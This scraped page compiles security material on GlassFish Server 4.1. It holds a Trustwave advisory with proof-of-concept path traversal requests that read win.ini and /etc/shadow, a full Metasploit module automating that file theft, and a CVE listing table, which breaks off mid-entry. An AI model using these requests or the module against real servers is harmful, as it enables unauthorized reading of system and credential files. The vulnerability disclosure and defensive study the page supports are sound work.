Glassfish server open source edition 4.1 2 vulnerabilities

Trustwave SpiderLabs Security Advisory TWSL2015-016: Path Traversal in Oracle GlassFish Server Open Source Edition Published: 08/27/2015 Version: 1.0 Vendor: Oracle Corporation (Project sponsored by Oracle) Product: GlassFish Server Open Source Edition Version affected: 4.1 and prior versions Product description: Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering. The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server being authenticated. Finding 1: Directory traversal Credit: Piotr Karolak of Trustwave's SpiderLabs #Proof of Concept on Microsoft Windows installation The authenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass, %C0%2F instead of (/),URL encoding. Example: REQUEST ======== GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini Cookie: JSESSIONID=5c47a3575077b014449e17877a0c Accept-Language: en-US Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://a.b.c.d:4848/ Host: a.b.c.d:4848 RESPONSE ======== HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.8) Last-Modified: Mon, 12 Jan 2015 10:00:00 GMT Transfer-Encoding: chunked ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo The response contains the contents of the "win.ini" file, proving that the server allows remote users to download the contents of system files. #Proof of Concept on Linux installation Example: REQUEST ======= GET /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow/ GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1 Host: a.b.c.d:4848 Accept: */* Accept-Language: en Connection: close RESPONSE ======== HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.7) Last-Modified: Tue, 13 Jan 2015 10:00:00 GMT Date: Tue, 10 Jan 2015 10:00:00 GMT Connection: close Content-Length: 1087 root:!:16436:0:99999:7::: daemon:*:16273:0:99999:7::: bin:*:16273:0:99999:7::: sys:*:16273:0:99999:7::: sync:*:16273:0:99999:7::: TRUNCATED lightdm:*:16273:0:99999:7::: colord:*:16273:0:99999:7::: hplip:*:16273:0:99999:7::: pulse:*:16273:0:99999:7::: test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7::: smmta:*:16436:0:99999:7::: smmsp:*:16436:0:99999:7::: mysql:!:16436:0:99999:7::: Vendor Response: "We plan to fix this issue in the next major GlassFish Server Open Source Edition release." Remediation Steps: No fix is available at this time for the GlassFish Server Open Source Edition release. However, this vulnerability can be mitigated with the use of technologies, such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Please note that Oracle GlassFish Server 3.x which is the current commercial release of GlassFish is not affected. Revision History: 01/12/2015 - Vulnerability disclosed to vendor 02/18/2015 - Notified vendor about the updates to TW security policy 05/19/2015 - Ninety-day deadline exceeded 07/14/2015 - Requested status from vendor 07/31/2015 - Requested status from vendor 08/21/2015 - Notified vendor about public disclosure 08/27/2015 - Advisory published References 1. https://www.owasp.org/index.php/Path_Traversal 2. https://glassfish.java.net/ 3. http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 

CVEdetails.com the ultimate security vulnerability data source

(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)

Use of this information constitutes acceptance for use in an AS IS condition.There are NO warranties, implied or otherwise, with regard to this information or its use.Any use of this information is at the user’s risk.It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content.EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site.ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT,INDIRECT or any other kind of loss.

CVE-2017-1000028

Detail

Current Description

Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.

View Analysis Description

Analysis Description

Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.

Severity

CVSS 3.x Severity and Metrics:
NIST CVSS score

NIST: 

NVD

Base Score: 7.5 HIGH

Vector: 

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 2.0 Severity and Metrics:

National Institute of Standards and Technology

NIST: 

NVD

Base Score: 5.0 MEDIUM

Vector: 

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Weakness Enumeration

CWE-ID CWE Name Source CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) cwe source acceptance level

NIST  

Known Affected Software Configurations Switch to CPE 2.2

CPEs loading, please wait.

Denotes Vulnerable Software
Are we missing a CPE here? Please let us know.

Change History

4 change records found show changes

Modified Analysis by NIST

5/03/2019 2:27:52 PM

Action Type Old Value New Value Changed Reference Type

https://www.exploit-db.com/exploits/45196/ No Types Assigned
https://www.exploit-db.com/exploits/45196/ Exploit, Third Party Advisory, VDB Entry

Changed Reference Type

https://www.exploit-db.com/exploits/45198/ No Types Assigned
https://www.exploit-db.com/exploits/45198/ Exploit, Third Party Advisory, VDB Entry

Changed Reference Type

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Mailing List, Third Party Advisory
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Exploit, Mailing List, Third Party Advisory

CVE Modified by MITRE

8/17/2018 6:29:01 AM

Action Type Old Value New Value Added Reference

https://www.exploit-db.com/exploits/45198/ [No Types Assigned]

CVE Modified by MITRE

8/16/2018 6:29:00 AM

Action Type Old Value New Value Added Reference

https://www.exploit-db.com/exploits/45196/ [No Types Assigned]

Initial Analysis by NIST

7/21/2017 11:50:13 AM

Action Type Old Value New Value Added CPE Configuration

OR *cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*

Added CVSS V2

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Added CVSS V3

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Added CWE

CWE-22

Changed Reference Type

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 No Types Assigned
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Mailing List, Third Party Advisory

Quick Info

CVE Dictionary Entry:
CVE-2017-1000028
NVD Published Date:

07/17/2017

NVD Last Modified:

05/03/2019

Source:

MITRE

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition', 'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability which exits in administration console of Oracle GlassFish Server 4.1, which is listening by default on port 4848/TCP. }, 'References' => [ ['CVE', '2017-1000028'], ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'], ['EDB', '39441'] ], 'Author' => [ 'Trustwave SpiderLabs', # Vulnerability discovery 'Dhiraj Mishra' # Metasploit module ], 'DisclosureDate' => 'Aug 08 2015', 'License' => MSF_LICENSE )) register_options( [ Opt::RPORT(4848), OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']), OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]) ]) end def run_host(ip) filename = datastore['FILEPATH'] traversal = "%c0%af.." * datastore['DEPTH'] << filename res = send_request_raw({ 'method' => 'GET', 'uri' => "/theme/META-INF/prototype#{traversal}" }) unless res && res.code == 200 print_error('Nothing was downloaded') return end vprint_good("#{peer} - #{res.body}") path = store_loot( 'oracle.traversal', 'text/plain', ip, res.body, filename ) print_good("File saved in: #{path}") end end 

Oracle » Glassfish Server : Security Vulnerabilities 1   2   3   4   5   6   7   8   9  

CVSS Scores Greater Than: 0

CVE Number Ascending   CVSS Score Descending   Number Of Exploits Descending

Sort Results By : CVE Number Descending

Copy ResultsDownload Results

Press ESC to close

# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail. 1 CVE-2021-3314 79 XSS 2021-06-25 2021-07-01

4.3

None Remote Medium Not required None Partial None ** UNSUPPORTED WHEN ASSIGNED ** Oracle GlassFish Server 3.1.2.18 and below allows /common/logViewer/logViewer.jsf XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2 CVE-2018-14324 798 +Info 2018-07-16 2019-05-20

10.0

None Remote Low Not required Complete Complete Complete The demo feature in Oracle GlassFish Open Source Edition 5.0 has TCP port 7676 open by default with a password of admin for the admin account. This allows remote attackers to obtain potentially sensitive information, perform database operations, or manipulate the demo via a JMX RMI session, aka a “jmx_rmi remote monitoring and control problem.” NOTE: this is not an Oracle supported product. 3 CVE-2018-3210 2018-10-17 2019-10-03

5.0

None Remote Low Not required Partial None None Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Java Server Faces). The supported version that is affected is 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GlassFish Server accessible data. CVSS 3.0 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 4 CVE-2018-3152 2018-10-17 2019-10-03

5.0

None Remote Low Not required None None Partial Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Administration). The supported version that is affected is 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). 5 CVE-2018-2911 DoS 2018-10-17 2019-10-03

6.8

None Remote Medium Not required Partial Partial Partial Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Java Server Faces). The supported version that is affected is 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle GlassFish Server accessible data as well as unauthorized access to critical data or complete access to all Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L). 6 CVE-2017-1000030 287 2017-07-17 2017-07-21

5.0

None Remote Low Not required Partial None None Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Java Key Store Password Disclosure vulnerability, that makes it possible to provide an unauthenticated attacker plain text password of administrative user and grant access to the web-based administration interface. 7 CVE-2017-1000029 200 +Info File Inclusion 2017-07-17 2017-07-21

5.0

None Remote Low Not required Partial None None Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication. 8 CVE-2017-1000028 22 Dir. Trav. 2017-07-17 2019-05-03

5.0

None Remote Low Not required Partial None None Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. 9 CVE-2017-10400 2017-10-19 2019-10-03

5.8

None Remote Medium Not required Partial Partial None Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Administration Graphical User Interface). The supported version that is affected is 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data. CVSS 3.0 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N). 10 CVE-2017-10393 DoS 2017-10-19 2019-10-03

6.8

None Remote Medium Not required Partial Partial Partial Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Web Container). Supported versions that are affected are 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L). 11 CVE-2017-10391 DoS 2017-10-19 2019-10-03

7.5

None Remote Low Not required Partial Partial Partial Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Administration). Supported versions that are affected are 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L). 12 CVE-2017-10385 DoS 2017-10-19 2019-10-03

6.8

None Remote Medium Not required Partial Partial Partial Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Web Container). Supported versions that are affected are 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L). 13 CVE-2017-3626 2017-04-24 2019-10-03

2.6

None Remote High Not required Partial None None Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Java Server Faces). The supported version that is affected is 3.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GlassFish Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). 14 CVE-2017-3250 200 DoS +Info 2017-01-27 2017-01-31

7.5

None Remote Low Not required Partial Partial Partial Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Security). Supported versions that are affected are 2.1.1, 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS v3.0 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). 15 CVE-2017-3249 DoS 2017-01-27 2017-01-31

7.5

None Remote Low Not required Partial Partial Partial Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Security). Supported versions that are affected are 2.1.1, 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via LDAP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS v3.0 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). 16 CVE-2017-3247 2017-01-27 2019-10-03

4.3

None Remote Medium Not required None Partial None Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Core). Supported versions that are affected are 2.1.1, 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via SMTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data. CVSS v3.0 Base Score 4.3 (Integrity impacts). 17 CVE-2017-3239 200 +Info 2017-01-27 2017-01-31

2.1

None Local Low Not required Partial None None Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Administration). Supported versions that are affected are 3.0.1 and 3.1.2. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle GlassFish Server executes to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GlassFish Server accessible data. CVSS v3.0 Base Score 3.3 (Confidentiality impacts). 18 CVE-2016-5528 2017-01-27 2017-01-31

6.8

None Remote Medium Not required Partial Partial Partial Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Security). Supported versions that are affected are 2.1.1, 3.0.1 and 3.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GlassFish Server. While the vulnerability is in Oracle GlassFish Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle GlassFish Server. CVSS v3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). 19 CVE-2016-5519 2016-10-25 2017-07-29

6.5

None Remote Low ??? Partial Partial Partial Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2 allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to Java Server Faces. 20 CVE-2016-5477 2016-07-21 2017-09-01

5.0

None Remote Low Not required Partial None None Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1 and 3.0.1 allows remote attackers to affect confidentiality via vectors related to Administration. 21 CVE-2016-3608 2016-07-21 2017-09-01

5.0

None Remote Low Not required Partial None None Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 3.0.1 allows remote attackers to affect confidentiality via vectors related to Administration. 22 CVE-2016-3607 2016-07-21 2017-09-01

10.0

None Remote Low Not required Complete Complete Complete Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 3.0.1 and 3.1.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Web Container. 23 CVE-2016-1950 119 Exec Code Overflow 2016-03-13 2019-12-27

6.8

None Remote Medium Not required Partial Partial Partial Heap-based buffer overflow in Mozilla Network Security Services (NSS) before 3.19.2.3 and 3.20.x and 3.21.x before 3.21.1, as used in Mozilla Firefox before 45.0 and Firefox ESR 38.x before 38.7, allows remote attackers to execute arbitrary code via crafted ASN.1 data in an X.509 certificate. 24 CVE-2015-7182 119 DoS Exec Code Overflow 2015-11-05 2017-11-04

7.5

None Remote Low Not required Partial Partial Partial Heap-based buffer overflow in the ASN.1 decoder in Mozilla Network Security Services (NSS) before 3.19.2.1 and 3.20.x before 3.20.1, as used in Firefox before 42.0 and Firefox ESR 38.x before 38.4 and other products, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted OCTET STRING data. 25 CVE-2015-3237 20 DoS +Info 2015-06-22 2018-10-17

6.4

None Remote Low Not required Partial None Partial The smb_request_state function in cURL and libcurl 7.40.0 through 7.42.1 allows remote SMB servers to obtain sensitive information from memory or cause a denial of service (out-of-bounds read and crash) via crafted length and offset values. 26 CVE-2013-1508 2013-04-17 2013-10-11

4.3

None Remote Medium Not required None Partial None Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Sun Middleware Products 3.0.1 and 3.1.2 allows remote attackers to affect integrity via vectors related to REST Interface. 27 CVE-2012-3155 2012-10-16 2013-10-11

5.0

None Remote Low Not required None None Partial Unspecified vulnerability in the CORBA ORB component in Sun GlassFish Enterprise Server 2.1.1, Oracle GlassFish Server 3.0.1 and 3.1.2, and Sun Java System Application Server 8.1 and 8.2 allows remote attackers to affect availability, related to CORBA ORB. 28 CVE-2012-0551 2012-05-03 2022-05-13

5.8

None Remote Medium Not required Partial Partial None Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE 7 update 4 and earlier and 6 update 32 and earlier, and the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Container or Deployment. 29 CVE-2012-0550 2012-05-03 2017-12-07

6.8

None Remote Medium Not required Partial Partial Partial Unspecified vulnerability in the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web Container. 30 CVE-2012-0104 2012-01-18 2017-08-29

5.0

None Remote Low Not required None None Partial Unspecified vulnerability in Oracle GlassFish Enterprise Server 3.0.1 and 3.1.1 allows remote attackers to affect availability via unknown vectors related to Web Container. 31 CVE-2012-0081 2012-01-18 2017-08-29

3.7

None Local High Not required Partial Partial Partial Unspecified vulnerability in Oracle GlassFish Enterprise Server 3.1.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Administration. 32 CVE-2011-5035 20 DoS 2011-12-30 2018-01-06

5.0

None Remote Low Not required None None Partial Oracle Glassfish 2.1.1, 3.0.1, and 3.1.1, as used in Communications Server 2.0, Sun Java System Application Server 8.1 and 8.2, and possibly other products, computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka Oracle security ticket S0104869. 33 CVE-2011-3559 2011-10-18 2017-08-29

7.8

None Remote Low Not required None None Complete Unspecified vulnerability in Oracle Communications Server 2.0; GlassFish Enterprise Server 2.1.1, 3.0.1, and 3.1.1; and Sun Java System App Server 8.1 and 8.2 allows remote attackers to affect availability via unknown vectors related to Web Container. 34 CVE-2011-0807 2011-04-20 2011-09-22

10.0

None Remote Low Not required Complete Complete Complete Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server 2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration. 35 CVE-2010-4438 2011-01-19 2017-08-17

5.7

None Local Low ??? Partial Partial Complete Unspecified vulnerability in Oracle GlassFish 2.1, 2.1.1, and 3.0.1, and Java System Message Queue 4.1 allows local users to affect confidentiality, integrity, and availability, related to Java Message Service (JMS). 36 CVE-2010-2397 2010-07-13 2012-10-23

2.4

None Local High ??? Partial Partial None Unspecified vulnerability in Oracle Sun Java System Application Server 8.0, 8.1, and 8.2; and GlassFish Enterprise Server 2.1.1; allows local users to affect confidentiality and integrity, related to the GUI. 37 CVE-2009-1553 79 XSS 2009-05-06 2018-10-10

4.3

None Remote Medium Not required None Partial None Multiple cross-site scripting (XSS) vulnerabilities in the Admin Console in Sun GlassFish Enterprise Server 2.1 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) applications/applications.jsf, (2) configuration/configuration.jsf, (3) customMBeans/customMBeans.jsf, (4) resourceNode/resources.jsf, (5) sysnet/registration.jsf, or (6) webService/webServicesGeneral.jsf; or the name parameter to (7) configuration/auditModuleEdit.jsf, (8) configuration/httpListenerEdit.jsf, or (9) resourceNode/jdbcResourceEdit.jsf. 38 CVE-2008-2751 79 XSS 2008-06-18 2018-10-11

4.3

None Remote Medium Not required None Partial None Multiple cross-site scripting (XSS) vulnerabilities in the Glassfish webadmin interface in Sun Java System Application Server 9.1_01 allow remote attackers to inject arbitrary web script or HTML via the (1) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:jndiProp:JndiNew, (2) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:resTypeProp:resType, (3) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:factoryClassProp:factoryClass, or (4) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:descProp:desc parameter to (a) resourceNode/customResourceNew.jsf; the (5) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:jndiProp:JndiNew, (6) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:resTypeProp:resType, (7) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:factoryClassProp:factoryClass, (8) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:jndiLookupProp:jndiLookup, or (9) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:descProp:desc parameter to (b) resourceNode/externalResourceNew.jsf; the (10) propertyForm:propertySheet:propertSectionTextField:jndiProp:Jndi, (11) propertyForm:propertySheet:propertSectionTextField:nameProp:name, or (12) propertyForm:propertySheet:propertSectionTextField:descProp:desc parameter to (c) resourceNode/jmsDestinationNew.jsf; the (13) 